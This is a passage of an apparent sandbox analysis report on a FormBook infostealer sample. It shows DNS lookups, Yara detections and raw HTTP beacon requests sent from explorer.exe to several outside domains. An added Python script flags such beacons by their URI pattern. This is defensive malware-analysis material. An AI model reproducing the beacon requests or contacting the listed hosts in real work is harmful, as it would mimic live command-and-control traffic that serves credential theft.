Jun 22, 2021 18:06:02.382002115 CEST | 192.168.2.4 | 8.8.8.8 | 0xc6ee | Standard query (0) | www.ty-valve.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:25.780879021 CEST | 192.168.2.4 | 8.8.8.8 | 0xefc | Standard query (0) | www.ty-valve.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:28.525279045 CEST | 192.168.2.4 | 8.8.8.8 | 0x722b | Standard query (0) | www.dietsz.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.154006004 CEST | 192.168.2.4 | 8.8.8.8 | 0x1237 | Standard query (0) | www.gangju123.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:39.529205084 CEST | 192.168.2.4 | 8.8.8.8 | 0x8a88 | Standard query (0) | www.ayanmobile.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:45.072633028 CEST | 192.168.2.4 | 8.8.8.8 | 0xc82 | Standard query (0) | www.securenotifications.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:46.067790985 CEST | 192.168.2.4 | 8.8.8.8 | 0xc82 | Standard query (0) | www.securenotifications.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:51.717861891 CEST | 192.168.2.4 | 8.8.8.8 | 0x534 | Standard query (0) | www.cuttingemporium.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:56.999191999 CEST | 192.168.2.4 | 8.8.8.8 | 0x598a | Standard query (0) | www.optimismactivism.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:07:02.257379055 CEST | 192.168.2.4 | 8.8.8.8 | 0xd849 | Standard query (0) | www.occasionalassistant.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 22, 2021 18:05:57.184031963 CEST | 8.8.8.8 | 192.168.2.4 | 0xe467 | No error (0) | www.collectordrive.com | collectordrive.com | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:05:57.184031963 CEST | 8.8.8.8 | 192.168.2.4 | 0xe467 | No error (0) | collectordrive.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:02.443214893 CEST | 8.8.8.8 | 192.168.2.4 | 0xc6ee | No error (0) | www.ty-valve.com | | 192.155.181.250 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:25.839808941 CEST | 8.8.8.8 | 192.168.2.4 | 0xefc | No error (0) | www.ty-valve.com | | 192.155.181.250 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:28.711617947 CEST | 8.8.8.8 | 192.168.2.4 | 0x722b | No error (0) | www.dietsz.com | | 208.91.197.91 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | www.gangju123.com | parking.namesilo.com | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 107.161.23.204 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 188.164.131.200 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 209.141.38.71 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 192.161.187.200 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 168.235.88.209 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 198.251.81.30 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 70.39.125.244 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 64.32.22.102 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 198.251.84.92 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 204.188.203.155 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:34.230094910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1237 | No error (0) | parking.namesilo.com | | 45.58.190.82 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:39.600775003 CEST | 8.8.8.8 | 192.168.2.4 | 0x8a88 | No error (0) | www.ayanmobile.com | ayanmobile.com | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:06:39.600775003 CEST | 8.8.8.8 | 192.168.2.4 | 0x8a88 | No error (0) | ayanmobile.com | | 160.153.78.1 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:46.367737055 CEST | 8.8.8.8 | 192.168.2.4 | 0xc82 | No error (0) | www.securenotifications.com | | 35.209.88.35 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:47.354382992 CEST | 8.8.8.8 | 192.168.2.4 | 0xc82 | No error (0) | www.securenotifications.com | | 35.209.88.35 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:51.792109966 CEST | 8.8.8.8 | 192.168.2.4 | 0x534 | No error (0) | www.cuttingemporium.com | cuttingemporium.com | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:06:51.792109966 CEST | 8.8.8.8 | 192.168.2.4 | 0x534 | No error (0) | cuttingemporium.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:06:57.062167883 CEST | 8.8.8.8 | 192.168.2.4 | 0x598a | No error (0) | www.optimismactivism.com | optimismactivism.com | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:06:57.062167883 CEST | 8.8.8.8 | 192.168.2.4 | 0x598a | No error (0) | optimismactivism.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:07:02.320333958 CEST | 8.8.8.8 | 192.168.2.4 | 0xd849 | No error (0) | www.occasionalassistant.com | occasionalassistant.com | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:07:02.320333958 CEST | 8.8.8.8 | 192.168.2.4 | 0xd849 | No error (0) | occasionalassistant.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.collectordrive.com
• www.dietsz.com
• www.gangju123.com
• www.ayanmobile.com
• www.securenotifications.com
• www.cuttingemporium.com
• www.optimismactivism.com
• www.occasionalassistant.com
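Added triage example, not part of the Joe Sandbox report: the script below rebuilds the name-to-address map from the DNS Answers table above (following the CNAME chains), groups the queried names by the address they end on, and flags HTTP requests that share the three traits of the beacon shown in the HTTP Packets section below (a Windows system process such as explorer.exe issuing a GET with Connection: close to a short-directory URI carrying two base64-like query parameters). The DNS and HTTP records embedded in it are constructed from the values on this page; the pipe-separated record layout, the BEACON_URI regex and the SYSTEM_HOSTS list are assumptions of this example, not anything the sandbox exports.

```python
"""Triage helper for the FormBook-style traffic seen in this report.

Added example, not part of the Joe Sandbox report. The DNS and HTTP records
below are constructed from the values shown on the page; the pipe-separated
layout is an assumption, not the sandbox's export format.
"""
import re
from collections import defaultdict

# Constructed from the report's DNS Answers table: name|cname (or '-')|address (or '-')
DNS_ANSWERS = """\
www.collectordrive.com|collectordrive.com|-
collectordrive.com|-|34.102.136.180
www.ty-valve.com|-|192.155.181.250
www.dietsz.com|-|208.91.197.91
www.gangju123.com|parking.namesilo.com|-
parking.namesilo.com|-|107.161.23.204
www.ayanmobile.com|ayanmobile.com|-
ayanmobile.com|-|160.153.78.1
www.securenotifications.com|-|35.209.88.35
www.cuttingemporium.com|cuttingemporium.com|-
cuttingemporium.com|-|34.102.136.180
www.optimismactivism.com|optimismactivism.com|-
optimismactivism.com|-|34.102.136.180
www.occasionalassistant.com|occasionalassistant.com|-
occasionalassistant.com|-|34.102.136.180
"""

# Constructed HTTP request records: process|method|host|request-target|Connection header.
# The first row is the request from the report; the second is a benign control.
HTTP_REQUESTS = """\
C:\\Windows\\explorer.exe|GET|www.collectordrive.com|/de52/?z6Ad_8Jp=q/8Nbvd67YPMVz3o7HcOnLFi8lrYmwA47pjKffLVRoseAGTrTNs7CZxo0gnZJZCgi/pT&Yz=0bpDyT|close
C:\\Program Files\\Mozilla Firefox\\firefox.exe|GET|www.example.com|/index.html?lang=en|keep-alive
"""

# Shape of the request-target seen in this report: a short alphanumeric directory,
# then a query string with two parameters whose values look base64-like.
# Heuristic regex (assumption), derived from the single observed URI.
BEACON_URI = re.compile(
    r"^/[a-z0-9]{2,8}/\?[A-Za-z0-9_]{2,12}=[A-Za-z0-9+/=_-]{16,}&[A-Za-z0-9_]{1,8}=[A-Za-z0-9+/=_-]+$"
)

# Windows system binaries that have no business originating HTTP beacons (assumed list).
SYSTEM_HOSTS = {"explorer.exe", "svchost.exe", "lsass.exe", "winlogon.exe"}


def resolve_map(dns_text):
    """Follow CNAME chains in the constructed answers; return {name: final_ip}."""
    cname, addr = {}, {}
    for line in dns_text.splitlines():
        name, c, a = line.split("|")
        if c != "-":
            cname[name] = c
        if a != "-":
            addr[name] = a
    resolved = {}
    for name in list(cname) + list(addr):
        cur, hops = name, 0
        while cur in cname and hops < 8:   # bound the walk so a CNAME loop cannot spin
            cur, hops = cname[cur], hops + 1
        if cur in addr:
            resolved[name] = addr[cur]
    return resolved


def shared_ips(resolved):
    """Group queried (www.) names by final IP; keep only IPs serving several names.
    Many unrelated names on one address is the decoy-domain pattern in this report."""
    by_ip = defaultdict(set)
    for name, ip in resolved.items():
        if name.startswith("www."):
            by_ip[ip].add(name)
    return {ip: sorted(names) for ip, names in by_ip.items() if len(names) > 1}


def is_beacon(process, target, connection):
    """True when a request matches all three traits of the beacon on this page."""
    exe = process.rsplit("\\", 1)[-1].lower()
    return (exe in SYSTEM_HOSTS
            and connection.lower() == "close"
            and BEACON_URI.match(target) is not None)


def triage(dns_text, http_text):
    """Return the beacon candidates with the address their Host name resolved to."""
    resolved = resolve_map(dns_text)
    hits = []
    for line in http_text.splitlines():
        process, method, host, target, conn = line.split("|")
        if method == "GET" and is_beacon(process, target, conn):
            hits.append({"host": host, "ip": resolved.get(host), "process": process})
    return hits


if __name__ == "__main__":
    for hit in triage(DNS_ANSWERS, HTTP_REQUESTS):
        print("beacon candidate:", hit)
    for ip, names in shared_ips(resolve_map(DNS_ANSWERS)).items():
        print(f"{ip} answers for {len(names)} queried names: {', '.join(names)}")
```

The grouping step is what makes the decoy pattern visible: four of the eight queried names end on 34.102.136.180 and one on a NameSilo parking host. FormBook is known to cycle through a list of domains of which only one is live, so the beacon flag identifies the requests to investigate, not which of the contacted domains is the real C2.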

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.44976534.102.136.18080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 22, 2021 18:05:57.232847929 CEST2490OUTGET /de52/?z6Ad_8Jp=q/8Nbvd67YPMVz3o7HcOnLFi8lrYmwA47pjKffLVRoseAGTrTNs7CZxo0gnZJZCgi/pT&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.collectordrive.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Timestamp: Jun 22, 2021 18:05:57.373182058 CEST
                                                                                                          kBytes transferred: 2491
                                                                                                          Direction: IN
                                                                                                          Data: HTTP/1.1 403 Forbidden
                                                                                                          Server: openresty
                                                                                                          Date: Tue, 22 Jun 2021 16:05:57 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 275
                                                                                                          ETag: "60cf306c-113"
                                                                                                          Via: 1.1 google
                                                                                                          Connection: close
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                          Session ID: 1
                                                                                                          Source IP: 192.168.2.4
                                                                                                          Source Port: 49773
                                                                                                          Destination IP: 208.91.197.91
                                                                                                          Destination Port: 80
                                                                                                          Process: C:\Windows\explorer.exe
                                                                                                          Timestamp: Jun 22, 2021 18:06:28.881365061 CEST
                                                                                                          kBytes transferred: 6965
                                                                                                          Direction: OUT
                                                                                                          Data: GET /de52/?z6Ad_8Jp=jbY8motXMJXjJrQ4SeyjR+FjRclRi1mJ8dBASwUO8jLWL5/FFIvWjS8rmQthPplPuKqV&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.dietsz.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Timestamp: Jun 22, 2021 18:06:29.140470028 CEST
                                                                                                          kBytes transferred: 6966
                                                                                                          Direction: IN
                                                                                                          Data: HTTP/1.1 200 OK
                                                                                                          Date: Tue, 22 Jun 2021 16:06:28 GMT
                                                                                                          Server: Apache
                                                                                                          Set-Cookie: vsid=927vr3719235890014433; expires=Sun, 21-Jun-2026 16:06:28 GMT; Max-Age=157680000; path=/; domain=www.dietsz.com; HttpOnly
                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Uw4qiUju2zz+weO4mV2Gl7k1nX7kTZn8uaqVZARtigLqyAUX38aGdpukBvac52fhLQzpcbQQJ2UWrAn9Fd/c7g==
                                                                                                          Content-Length: 2548
                                                                                                          Keep-Alive: timeout=5, max=84
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Ascii: ...top.location="http://www.dietsz.com/?fp=0ld0t%2BJWhRk8WdVTPGPL9BAgIOmit3FoyNL3F7PG%2FpOrPWS5AHpLrMyvP9YO3wpaQYcv6yVSBCX2phcK8EgidgEXcGFfbPsw%2FbVH9Kz4tChEnw0I8VqqjXxnMpmjUObi7KKvThQs5wRiMt9RERAv3NxU2sOXTI1hqZLLDUL1ROI%3D&prvtof=5NV4cairyXI6h7f46M9%2Ft%2B9XH6expjtIRpb79jZ7vrU%3D&poru=fdRbzwEEWkghA8IHxWkxcvhZ7UqKSruPvnWHh8AjWbrYHM7%2BE2oAjSM%2BFUQh1nStU%2FOdJzluqwwEDRk6CjuWWz2YykjDLuX%2BWHx1CXsetr5aRNtuoewVq14tgGpRrGJ2BouKIujnzxuanzJMS7F4ocvx3H1XzNe8umclQiuyjPvoTlXW9%2BJGVvqsFuoNt6Q8&cifr=1&z6Ad_8Jp=jbY8motXMJXjJrQ4SeyjR+FjRclRi1mJ8dBASwUO8jLWL5%2FFFIvWjS8rmQthPplPuKqV&Yz=0bpDyT";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Uw4qiUju2zz+


                                                                                                          Session ID: 2
                                                                                                          Source IP: 192.168.2.4
                                                                                                          Source Port: 49776
                                                                                                          Destination IP: 107.161.23.204
                                                                                                          Destination Port: 80
                                                                                                          Process: C:\Windows\explorer.exe
                                                                                                          Timestamp: Jun 22, 2021 18:06:34.372102976 CEST
                                                                                                          kBytes transferred: 6987
                                                                                                          Direction: OUT
                                                                                                          Data: GET /de52/?z6Ad_8Jp=KfmGdnK98UrOdo4kMnFtb2+M9fToEn1F+Gzo6oV5pCedLQ1HneT9cj2ied9UzRR+PF6A&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.gangju123.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Timestamp: Jun 22, 2021 18:06:34.511514902 CEST
                                                                                                          kBytes transferred: 6988
                                                                                                          Direction: IN
                                                                                                          Data: HTTP/1.1 302 Moved Temporarily
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 22 Jun 2021 16:06:34 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 154
                                                                                                          Connection: close
                                                                                                          Location: http://www.gangju123.com?z6Ad_8Jp=KfmGdnK98UrOdo4kMnFtb2+M9fToEn1F+Gzo6oV5pCedLQ1HneT9cj2ied9UzRR+PF6A&Yz=0bpDyT
                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                          Session ID: 3
                                                                                                          Source IP: 192.168.2.4
                                                                                                          Source Port: 49777
                                                                                                          Destination IP: 160.153.78.1
                                                                                                          Destination Port: 80
                                                                                                          Process: C:\Windows\explorer.exe
                                                                                                          Timestamp: Jun 22, 2021 18:06:39.786784887 CEST
                                                                                                          kBytes transferred: 6989
                                                                                                          Direction: OUT
                                                                                                          Data: GET /de52/?z6Ad_8Jp=VjXAIgKfhvF8hRWD/e05oFFe9piey6xRf/uiJW4aXhiEfFySQTYX7BGVKv+i/OP+5wGQ&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.ayanmobile.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Timestamp: Jun 22, 2021 18:06:40.022874117 CEST
                                                                                                          kBytes transferred: 6990
                                                                                                          Direction: IN
                                                                                                          Data: HTTP/1.1 307 Temporary Redirect
                                                                                                          Date: Tue, 22 Jun 2021 16:06:39 GMT
                                                                                                          Server: Apache
                                                                                                          X-Powered-By: PHP/7.3.27
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Set-Cookie: sma_token_cookie=b3f0f9d0325ac9f0e1e456ac4dd5e969; expires=Tue, 22-Jun-2021 18:06:39 GMT; Max-Age=7200; path=/
                                                                                                          Set-Cookie: sess=99b68994a776bbb61303eb0074393aaf0390e97d; expires=Tue, 22-Jun-2021 18:06:39 GMT; Max-Age=7200; path=/; HttpOnly
                                                                                                          Upgrade: h2,h2c
                                                                                                          Connection: Upgrade, close
                                                                                                          Location: http://ayanmobile.com/
                                                                                                          Vary: User-Agent
                                                                                                          Content-Length: 0
                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                          Session ID: 4
                                                                                                          Source IP: 192.168.2.4
                                                                                                          Source Port: 49778
                                                                                                          Destination IP: 35.209.88.35
                                                                                                          Destination Port: 80
                                                                                                          Process: C:\Windows\explorer.exe
                                                                                                          Timestamp: Jun 22, 2021 18:06:46.522727013 CEST
                                                                                                          kBytes transferred: 6991
                                                                                                          Direction: OUT
                                                                                                          Data: GET /de52/?z6Ad_8Jp=/MwPCQmb8N4Awmw4mMKJPRGOCBQ0FmS8LiYPDqoyki9FgjxxSyxFyKWOR1kxSGqMaJan&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.securenotifications.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Timestamp: Jun 22, 2021 18:06:46.698638916 CEST
                                                                                                          kBytes transferred: 6993
                                                                                                          Direction: IN
                                                                                                          Data: HTTP/1.1 404 Not Found
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 22 Jun 2021 16:06:46 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          X-Httpd: 1
                                                                                                          Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                                                          X-Proxy-Cache: MISS
                                                                                                          X-Proxy-Cache-Info: 0 NC:000000 UP:
                                                                                                          Data Ascii: 13d8f<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { position: relative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20


                                                                                                          Session ID: 5
                                                                                                          Source IP: 192.168.2.4
                                                                                                          Source Port: 49779
                                                                                                          Destination IP: 34.102.136.180
                                                                                                          Destination Port: 80
                                                                                                          Process: C:\Windows\explorer.exe
                                                                                                          Timestamp: Jun 22, 2021 18:06:51.837527990 CEST
                                                                                                          kBytes transferred: 7018
                                                                                                          Direction: OUT
                                                                                                          Data: GET /de52/?z6Ad_8Jp=A6XO+ITKnQQbOEvUMrF2CVYLPv45kLd/uv2YdfW9vEZfPW6611dfa85KEkC5Wqh6gBNa&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.cuttingemporium.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Timestamp: Jun 22, 2021 18:06:51.976614952 CEST
                                                                                                          kBytes transferred: 7019
                                                                                                          Direction: IN
                                                                                                          Data: HTTP/1.1 403 Forbidden
                                                                                                          Server: openresty
                                                                                                          Date: Tue, 22 Jun 2021 16:06:51 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 275
                                                                                                          ETag: "60c7be46-113"
                                                                                                          Via: 1.1 google
                                                                                                          Connection: close
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                          Session ID: 6
                                                                                                          Source IP: 192.168.2.4
                                                                                                          Source Port: 49780
                                                                                                          Destination IP: 34.102.136.180
                                                                                                          Destination Port: 80
                                                                                                          Process: C:\Windows\explorer.exe
                                                                                                          Timestamp: Jun 22, 2021 18:06:57.107094049 CEST
                                                                                                          kBytes transferred: 7020
                                                                                                          Direction: OUT
                                                                                                          Data: GET /de52/?z6Ad_8Jp=LwTVedL55OWwkv7g5+M8qNIWWWhwOSQTlz2nKf3SzAUgx635MxYM24Oa4PrOeZWczuGU&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.optimismactivism.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Timestamp: Jun 22, 2021 18:06:57.245840073 CEST
                                                                                                          kBytes transferred: 7021
                                                                                                          Direction: IN
                                                                                                          Data: HTTP/1.1 403 Forbidden
                                                                                                          Server: openresty
                                                                                                          Date: Tue, 22 Jun 2021 16:06:57 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 275
                                                                                                          ETag: "60c7be36-113"
                                                                                                          Via: 1.1 google
                                                                                                          Connection: close
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                          Session ID: 7
                                                                                                          Source IP: 192.168.2.4
                                                                                                          Source Port: 49781
                                                                                                          Destination IP: 34.102.136.180
                                                                                                          Destination Port: 80
                                                                                                          Process: C:\Windows\explorer.exe
                                                                                                          Timestamp: Jun 22, 2021 18:07:02.363946915 CEST
                                                                                                          kBytes transferred: 7022
                                                                                                          Direction: OUT
                                                                                                          Data: GET /de52/?z6Ad_8Jp=qb+cDyZ+/Kn0EiG8qAwackOr+Z8XD7HPsMVV4+H0Ra088mc2au++kj7rvX/qHs87RHMJ&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.occasionalassistant.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Timestamp: Jun 22, 2021 18:07:02.503415108 CEST
                                                                                                          kBytes transferred: 7022
                                                                                                          Direction: IN
                                                                                                          Data: HTTP/1.1 403 Forbidden
                                                                                                          Server: openresty
                                                                                                          Date: Tue, 22 Jun 2021 16:07:02 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 275
                                                                                                          ETag: "60c7be6a-113"
                                                                                                          Via: 1.1 google
                                                                                                          Connection: close
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          Behavior


                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Start time:18:04:57
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Users\user\Desktop\New Order.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\New Order.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:206093 bytes
                                                                                                          MD5 hash:4AF03301316C984C17CA822456B6D918
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Start time:18:04:58
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Users\user\Desktop\New Order.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\New Order.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:206093 bytes
                                                                                                          MD5 hash:4AF03301316C984C17CA822456B6D918
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Start time:18:05:03
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Windows\explorer.exe
